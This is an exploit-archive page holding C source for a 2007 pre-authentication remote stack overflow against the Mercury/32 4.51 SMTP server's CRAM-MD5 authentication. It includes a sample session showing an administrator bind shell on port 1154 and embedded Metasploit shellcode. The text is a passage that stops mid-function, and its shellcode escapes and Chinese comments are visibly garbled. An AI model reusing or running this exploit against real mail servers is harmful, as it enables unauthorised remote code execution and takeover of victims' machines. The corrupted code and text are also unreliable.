Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Overflow Exploit
# Published : 2007-08-22
# Author : ZhenHan.Liu
# Previous Title : ClamAV Milter <= 0.92.2 Blackhole-Mode (sendmail) Code Execution
# Next Title : eCentrex VOIP Client module (uacomx.ocx 2.0.1) Remote BOF Exploit

/*
	Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Stack Overflow(Universal)
	Public Version 1.0
	http://www.ph4nt0m.org   
	2007-08-22
	
	Code by: Zhenhan.Liu
	Original POC: http://www.milw0rm.com/exploits/4294
	
	Vuln Analysis: http://pstgroup.blogspot.com/2007/08/tipsmercury-smtpd-auth-cram-md5-pre.html
	
	Our Mail-list: http://list.ph4nt0m.org  (Chinese)

  It will bind a cmdshell on port 1154 if successful.

Z:ExpMercury SMTPD>mercury_smtpd.exe 127.0.0.1 25
== Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Stack Overflow
== Public Version 1.0
== http://www.ph4nt0m.org   2007-08-22

[*] connect to 127.0.0.1:25 ... OK!
[C] EHLO void#ph4nt0m.org
[S] 220 root ESMTP server ready.
[S] 250-root Hello void#ph4nt0m.org; ESMTPs are:
250-TIME
[S] 250-SIZE 0
[S] 250 HELP
[C] AUTH CRAM-MD5
[S] 334 PDM0OTg4MjguMzQ2QHJvb3Q+
[C] Send Payload...
[-] Done! cmdshell@1154?

Z:ExpMercury SMTPDMercury SMTPD>nc -vv 127.0.0.1 1154
DNS fwd/rev mismatch: localhost != gnu
localhost [127.0.0.1] 1154 (?) open
Microsoft Windows XP [?°?|?±?? 5.1.2600]
(C) ?°?|???¨???1?“?? 1985-2001 Microsoft Corp.

e:MERCURY>whoami
whoami
Administrator
  

*/

#include <io.h>
#include <stdio.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32")


/* win32_bind -  EXITFUNC=thread LPORT=1154 Size=317 Encoder=None http://metasploit.com */
unsigned char shellcode[] =
"xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45"
"x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49"
"x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d"
"x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66"
"x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61"
"xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40"
"x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32"
"x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6"
"x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09"
"xf5xadx57xffxd6x53x53x53x53x53x43x53x43x53xffxd0"
"x66x68x04x82x66x53x89xe1x95x68xa4x1ax70xc7x57xff"
"xd6x6ax10x51x55xffxd0x68xa4xadx2exe9x57xffxd6x53"
"x55xffxd0x68xe5x49x86x49x57xffxd6x50x54x54x55xff"
"xd0x93x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64"
"x66x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89"
"xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38xab"
"xabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57x52x51"
"x51x51x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53"
"xffxd6x6axffxffx37xffxd0x8bx57xfcx83xc4x64xffxd6"
"x52xffxd0x68xefxcexe0x60x53xffxd6xffxd0";



// Base64?—?–?·?????ˉ
__inline char GetB64Char(int index)
{
    const char szBase64Table[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    if (index >= 0 && index < 64)
	return szBase64Table[index];
    
    return '=';
}


// ?′?“?????—?–?–???????μ?￥?—?–????
#define B0(a) (a & 0xFF)
#define B1(a) (a >> 8 & 0xFF)
#define B2(a) (a >> 16 & 0xFF)
#define B3(a) (a >> 24 & 0xFF)


// ?±???????o?3?μ???3?¤?????’???°?￡?±???”?-????????????1/3?μ???′?|?′?￠???????¤?￡???????±?￡?–?¤base64code?“???—?￡?1???μ?????????¤
inline int Base64Encode(char * base64code, const char * src, int src_len) 
{   
    if (src_len == 0)
	src_len = strlen(src);
    
    int len = 0;
    unsigned char* psrc = (unsigned char*)src;
    char * p64 = base64code;
    for (int i = 0; i < src_len - 3; i += 3)
    {
	unsigned long ulTmp = *(unsigned long*)psrc;
	register int b0 = GetB64Char((B0(ulTmp) >> 2) & 0x3F); 
	register int b1 = GetB64Char((B0(ulTmp) << 6 >> 2 | B1(ulTmp) >> 4) & 0x3F); 
	register int b2 = GetB64Char((B1(ulTmp) << 4 >> 2 | B2(ulTmp) >> 6) & 0x3F); 
	register int b3 = GetB64Char((B2(ulTmp) << 2 >> 2) & 0x3F); 
	*((unsigned long*)p64) = b0 | b1 << 8 | b2 << 16 | b3 << 24;
	len += 4;

	p64  += 4;

	psrc += 3;
    }
    
    // ?′?|?